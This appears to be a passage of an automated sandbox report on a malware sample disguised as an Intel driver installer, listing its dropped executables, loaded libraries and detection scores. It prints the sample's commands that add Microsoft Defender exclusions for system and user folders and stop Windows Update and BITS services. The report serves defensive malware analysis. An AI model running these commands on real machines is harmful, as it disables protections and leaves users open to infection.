                              Source: C:\Users\user\Desktop\thcdVit1dX.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: thcdVit1dX.exeReversingLabs: Detection: 65%
                              Source: thcdVit1dX.exeVirustotal: Detection: 61%
                              Source: thcdVit1dX.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
                              Source: thcdVit1dX.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
                              Source: thcdVit1dX.exeString found in binary or memory: bOriginalFilenameIntel-Driver-and-Support-Assistant-Installer.exedDProductNameIntel
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeFile read: C:\Users\user\Desktop\thcdVit1dX.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\thcdVit1dX.exe "C:\Users\user\Desktop\thcdVit1dX.exe"
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeProcess created: C:\Users\user\AppData\Local\Temp\4BBF.exe "C:\Users\user\AppData\Local\Temp\4BBF.exe"
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeProcess created: C:\Users\user\AppData\Local\Temp\71384504.exe C:\Users\user\AppData\Local\Temp\71384504.exe
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeProcess created: C:\Windows\sysppvrdnvs.exe C:\Windows\sysppvrdnvs.exe
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Source: unknownProcess created: C:\Windows\sysppvrdnvs.exe "C:\Windows\sysppvrdnvs.exe"
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\2355412914.exe C:\Users\user\AppData\Local\Temp\2355412914.exe
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\2658326577.exe C:\Users\user\AppData\Local\Temp\2658326577.exe
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeProcess created: C:\Users\user\AppData\Local\Temp\4BBF.exe "C:\Users\user\AppData\Local\Temp\4BBF.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeProcess created: C:\Users\user\AppData\Local\Temp\71384504.exe C:\Users\user\AppData\Local\Temp\71384504.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeProcess created: C:\Windows\sysppvrdnvs.exe C:\Windows\sysppvrdnvs.exeJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /waitJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\2355412914.exe C:\Users\user\AppData\Local\Temp\2355412914.exeJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\2658326577.exe C:\Users\user\AppData\Local\Temp\2658326577.exeJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvcJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvcJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop wuauservJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop DoSvcJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop BITS /waitJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /fJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: firewallapi.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: fwbase.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\2658326577.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\2658326577.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\2658326577.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\2658326577.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\2658326577.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\2658326577.exeSection loaded: netutils.dll
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: thcdVit1dX.exeStatic file information: File size 1390680 > 1048576
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
                              Source: thcdVit1dX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: thcdVit1dX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: thcdVit1dX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: thcdVit1dX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: thcdVit1dX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: thcdVit1dX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: thcdVit1dX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: D:\a\wix\wix\build\burn\Release\x86\burn.pdbA source: thcdVit1dX.exe
                              Source: Binary string: D:\a\wix\wix\build\burn\Release\x86\burn.pdb source: thcdVit1dX.exe
                              Source: thcdVit1dX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                              Source: thcdVit1dX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                              Source: thcdVit1dX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                              Source: thcdVit1dX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                              Source: thcdVit1dX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                              Source: initial sampleStatic PE information: section where entry point is pointing to: .zero
                              Source: thcdVit1dX.exeStatic PE information: section name: .didat
                              Source: thcdVit1dX.exeStatic PE information: section name: .wixburn
                              Source: thcdVit1dX.exeStatic PE information: section name: .zero
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_00476973 push ecx; ret 0_2_00476986
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeCode function: 2_2_00C91A31 push ecx; ret 2_2_00C91A44

                              Persistence and Installation Behavior

                              barindex
                              Drops executables to the windows directory (C:\Windows) and starts them
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeExecutable created and started: C:\Windows\sysppvrdnvs.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeFile created: C:\Windows\sysppvrdnvs.exeJump to dropped file
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\pei[1].exeJump to dropped file
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeFile created: C:\Users\user\AppData\Local\Temp\4BBF.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeFile created: C:\Users\user\AppData\Local\Temp\71384504.exeJump to dropped file
